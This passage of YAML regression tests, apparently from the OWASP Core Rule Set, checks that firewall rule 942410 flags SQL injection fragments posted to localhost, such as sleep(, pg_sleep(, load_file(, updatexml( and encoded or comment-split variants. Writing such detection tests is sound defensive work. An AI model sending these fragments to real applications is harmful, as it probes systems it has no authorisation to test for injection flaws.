- - test_title: 942410-39 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=if%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-40 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=if%5C%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-41 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=IFNULL%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-42 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=in+%27%24%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-43 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=IN+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-44 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=IN%2F%2A%2A%2F%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-45 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=insert%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-46 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=left%27%29%3F%24%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-47 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=LEFT%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-48 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=length%7C%7C%21%21%24%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-49 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=length%7C%7C%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-50 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=length%3F%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-51 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=length%26%26%21%21%21%24%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-52 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=length%26%26%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-53 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=LENGTH%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-54 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=ln+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-55 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=ln%29+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-56 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=load_file%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-57 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=local%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-58 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=log%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-59 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=log%26%26%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-60 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=lower%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-61 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=MAKE_SET%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-62 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=MAX%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-63 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=md5%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-64 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=md5%5C%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-65 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=MID%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-66 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=minute+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-67 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=month%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-68 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "name_const(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-69 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "now(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-70 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "nOW(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-71 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "ord(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-72 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "password?(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-73 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "password/?(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-74 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "Password>$(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-75 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pg_sleep(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-76 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pi(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-77 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "PI(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-78 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pow(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-79 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "POW(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-80 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "quarter. (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-81 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "rand(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-82 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "Rand (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-83 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "RAND(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-84 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "replace(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-85 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "REPLACE(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-86 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "round (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-87 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "round(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-88 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "rtrim(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-89 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "RTRIM(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-90 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=sin (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-91 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SIN(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-92 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=sleep(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-93 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SLEEP (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-94 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=strcmp(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-95 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=substr(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-96 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SUBSTR(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-97 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=substring(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-98 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SUBSTRING(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-99 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=sysdate(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-100 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "time (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-101 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=time%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-102 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=trim%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-103 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=Uncompress+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-104 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=unhex%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-105 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=uNhEx%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-106 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=updatexml%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-107 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=UpdateXML%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-108 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=UPPER%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-109 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=user+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-110 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=user%2F%3F%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-111 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=user%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-112 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=values+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-113 - desc: "SQL Injection Attack" 